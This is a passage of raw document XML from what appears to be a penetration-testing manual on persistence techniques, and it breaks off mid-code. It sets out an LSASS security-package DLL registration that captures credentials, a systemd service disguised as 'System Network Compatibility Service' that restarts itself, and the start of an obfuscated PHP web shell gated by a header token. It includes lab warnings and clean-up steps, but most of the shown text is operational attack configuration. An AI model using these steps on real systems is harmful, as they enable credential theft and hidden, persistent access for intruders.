          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:left w:val="single" w:color="C62828" w:sz="12" w:space="10"/>
          <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:pBdr>
        <w:shd w:fill="F5F7FA" w:val="clear"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C62828"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WARNING:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">This technique modifies LSASS configuration. On real systems, Credential Guard will block SSP DLL injection on modern Windows 10/11 with TPM. Test only on VMs without Credential Guard.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Registry Key: HKLM\SYSTEM\CurrentControlSet\Control\Lsa</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Value:        Security Packages (REG_MULTI_SZ)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Append DLL:   sysnetcompat  (without .dll extension)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">DLL location: Must be in C:\Windows\System32\</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Loaded by:    lsass.exe as SYSTEM at next boot</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># DLL exports required:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">SpLsaModeInitialize() — called by LSASS with credential data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># Clean up:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">reg query "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "Security Packages"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># Remove DLL name from the multi-string value</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="360" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1565C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux: Systemd Service (T1543.002)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Creates a systemd unit file that starts automatically at boot (system service) or user login (user service). The KeepAlive feature acts as a watchdog — if the payload process exits, systemd automatically restarts it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># System service (root — boot level):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Path: /etc/systemd/system/sysnetcompat.service</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">[Unit]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Description=System Network Compatibility Service</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">After=network.target</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">[Service]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Type=simple</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Restart=always</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">RestartSec=30</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">ExecStart=/usr/bin/sysnetd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">[Install]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">WantedBy=multi-user.target</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># Enable and start:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">systemctl daemon-reload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">systemctl enable --now sysnetcompat</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># Verify:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">systemctl status sysnetcompat</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">systemctl is-enabled sysnetcompat</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># Clean up:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">systemctl disable --now sysnetcompat</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">rm /etc/systemd/system/sysnetcompat.service</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">systemctl daemon-reload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="360" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1565C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Cross-Platform: Web Shell (T1505.003)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Generates obfuscated PHP, ASPX, and JSP web shells with custom header-based authentication to prevent accidental discovery by crawlers. The shell drops to common web root paths and is immediately functional if the web server is running.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># Generated PHP shell (simplified view):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">$t = isset($_SERVER['HTTP_X_PT_TOKEN']) ? $_SERVER['HTTP_X_PT_TOKEN'] : '';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">if($t !== 'PT_Lab_2025') { http_response_code(404); die(); }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
